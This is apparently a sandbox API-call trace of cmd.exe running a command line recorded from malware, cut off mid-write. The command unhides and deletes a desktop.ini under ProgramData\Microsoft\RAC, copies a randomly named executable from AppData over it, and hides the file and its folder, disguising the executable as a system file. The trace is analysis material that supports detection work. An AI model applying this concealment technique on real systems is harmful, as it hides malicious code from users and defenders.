1 [0119.428] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.428] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0119.428] GetEnvironmentStringsW () returned 0x2204e8* [0119.428] FreeEnvironmentStringsW (penv=0x2204e8) returned 1 [0119.428] GetEnvironmentStringsW () returned 0x2204e8* [0119.428] FreeEnvironmentStringsW (penv=0x2204e8) returned 1 [0119.428] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e804 | out: phkResult=0x12e804*=0x40) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x98, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x4) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x0, lpcbData=0x12e808*=0x4) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x4) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x4) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.428] RegCloseKey (hKey=0x40) returned 0x0 [0119.428] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e804 | out: phkResult=0x12e804*=0x40) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x4) returned 0x0 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x0, lpcbData=0x12e808*=0x4) returned 0x0 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x4) returned 0x0 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x4) returned 0x0 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.429] RegCloseKey (hKey=0x40) returned 0x0 [0119.429] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635f [0119.429] srand (_Seed=0x5b88635f) [0119.429] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"" [0119.429] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"" [0119.429] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.429] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x221c48, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0119.429] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.429] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.430] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.430] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0119.430] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0119.430] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0119.430] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0119.430] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0119.430] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0119.430] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0119.430] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0119.430] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0119.430] GetEnvironmentStringsW () returned 0x222638* [0119.430] FreeEnvironmentStringsW (penv=0x222638) returned 1 [0119.430] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.430] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.430] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0119.430] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0119.430] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0119.430] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0119.430] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0119.430] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0119.430] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0119.430] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0119.430] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f5d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.430] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f5d0, lpFilePart=0x12f5cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f5cc*="Desktop") returned 0x18 [0119.430] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0119.431] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x220cc8 [0119.431] FindClose (in: hFindFile=0x220cc8 | out: hFindFile=0x220cc8) returned 1 [0119.431] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x220cc8 [0119.431] FindClose (in: hFindFile=0x220cc8 | out: hFindFile=0x220cc8) returned 1 [0119.431] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x220cc8 [0119.431] FindClose (in: hFindFile=0x220cc8 | out: hFindFile=0x220cc8) returned 1 [0119.431] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0119.431] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0119.431] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0119.431] GetEnvironmentStringsW () returned 0x2204e8* [0119.432] FreeEnvironmentStringsW (penv=0x2204e8) returned 1 [0119.432] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.432] GetConsoleOutputCP () returned 0x1b5 [0119.432] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.432] GetUserDefaultLCID () returned 0x409 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f710, cchData=128 | out: lpLCData="0") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f710, cchData=128 | out: lpLCData="0") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f710, cchData=128 | out: lpLCData="1") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0119.433] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0119.434] GetConsoleTitleW (in: lpConsoleTitle=0x210af8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.434] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0119.434] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0119.434] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0119.434] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0119.435] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0119.435] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0119.435] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0119.435] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0119.435] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0119.435] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0119.435] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0119.437] _wcsicmp (_String1="del", _String2=")") returned 59 [0119.437] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0119.437] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0119.437] _wcsicmp (_String1="IF", _String2="del") returned 5 [0119.437] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0119.437] _wcsicmp (_String1="REM", _String2="del") returned 14 [0119.437] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0119.439] _wcsicmp (_String1="type", _String2=")") returned 75 [0119.439] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0119.439] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0119.439] _wcsicmp (_String1="IF", _String2="type") returned -11 [0119.439] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0119.439] _wcsicmp (_String1="REM", _String2="type") returned -2 [0119.439] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0119.443] SetErrorMode (uMode=0x0) returned 0x0 [0119.443] SetErrorMode (uMode=0x1) returned 0x0 [0119.443] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2204f0, lpFilePart=0x12eec4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12eec4*="Desktop") returned 0x18 [0119.443] SetErrorMode (uMode=0x0) returned 0x1 [0119.443] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.443] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.448] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec40) returned 0xffffffff [0119.448] GetLastError () returned 0x2 [0119.448] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec40) returned 0xffffffff [0119.448] GetLastError () returned 0x2 [0119.448] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec40) returned 0x2225d8 [0119.448] FindClose (in: hFindFile=0x2225d8 | out: hFindFile=0x2225d8) returned 1 [0119.449] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec40) returned 0xffffffff [0119.449] GetLastError () returned 0x2 [0119.449] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec40) returned 0x2225d8 [0119.449] FindClose (in: hFindFile=0x2225d8 | out: hFindFile=0x2225d8) returned 1 [0119.449] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.449] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.449] GetConsoleTitleW (in: lpConsoleTitle=0x12f138, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.521] InitializeProcThreadAttributeList (in: lpAttributeList=0x12efc0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f088 | out: lpAttributeList=0x12efc0, lpSize=0x12f088) returned 1 [0119.521] UpdateProcThreadAttribute (in: lpAttributeList=0x12efc0, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f080, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12efc0, lpPreviousValue=0x0) returned 1 [0119.521] GetStartupInfoW (in: lpStartupInfo=0x12ef7c | out: lpStartupInfo=0x12ef7c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0119.521] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.522] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f01c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f068 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", lpProcessInformation=0x12f068*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf64, dwThreadId=0xf68)) returned 1 [0119.529] CloseHandle (hObject=0x4c) returned 1 [0119.529] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.529] GetEnvironmentStringsW () returned 0x220a18* [0119.529] FreeEnvironmentStringsW (penv=0x220a18) returned 1 [0119.529] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0119.812] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12ef5c | out: lpExitCode=0x12ef5c*=0x0) returned 1 [0119.812] CloseHandle (hObject=0x50) returned 1 [0119.812] _vsnwprintf (in: _Buffer=0x12f0a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ef68 | out: _Buffer="00000000") returned 8 [0119.812] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0119.812] GetEnvironmentStringsW () returned 0x222628* [0119.812] FreeEnvironmentStringsW (penv=0x222628) returned 1 [0119.812] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0119.813] GetEnvironmentStringsW () returned 0x222628* [0119.813] FreeEnvironmentStringsW (penv=0x222628) returned 1 [0119.813] DeleteProcThreadAttributeList (in: lpAttributeList=0x12efc0 | out: lpAttributeList=0x12efc0) [0119.813] GetConsoleTitleW (in: lpConsoleTitle=0x12f340, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.813] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e3b8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x12e3bc, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e3b8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0119.813] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0119.814] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0119.814] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0119.814] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\publis~1\\desktop.ini")) returned 0xffffffff [0119.814] GetLastError () returned 0x2 [0119.814] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\publis~1")) returned 0x2010 [0119.814] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0119.814] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0119.814] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\publis~1\\desktop.ini")) returned 0xffffffff [0119.814] GetLastError () returned 0x2 [0119.814] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x2236b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2236b4) returned 0xffffffff [0119.814] GetLastError () returned 0x2 [0119.815] _get_osfhandle (_FileHandle=2) returned 0xb [0119.815] GetFileType (hFile=0xb) returned 0x2 [0119.815] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0119.815] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12edb8 | out: lpMode=0x12edb8) returned 1 [0119.815] _get_osfhandle (_FileHandle=2) returned 0xb [0119.815] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12edec | out: lpConsoleScreenBufferInfo=0x12edec) returned 1 [0119.815] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0119.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.816] GetFileType (hFile=0x7) returned 0x2 [0119.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0119.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f4dc | out: lpMode=0x12f4dc) returned 1 [0119.816] _dup (_FileHandle=1) returned 3 [0119.817] _close (_FileHandle=1) returned 0 [0119.817] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini", _String2="con") returned -53 [0119.817] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\publis~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12f4ac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0119.819] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0119.819] GetConsoleTitleW (in: lpConsoleTitle=0x12f2dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.819] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x12ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ee40) returned 0x21e6b8 [0119.819] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0119.819] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0119.820] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0119.820] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12dd4c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0119.820] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0119.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.820] GetFileType (hFile=0x58) returned 0x1 [0119.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.820] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x12dda4 | out: lpFileSizeHigh=0x12dda4*=0x0) returned 0x7d600 [0119.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.820] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.820] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.821] GetFileType (hFile=0x50) returned 0x1 [0119.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.821] GetFileType (hFile=0x50) returned 0x1 [0119.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.821] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.823] GetFileType (hFile=0x50) returned 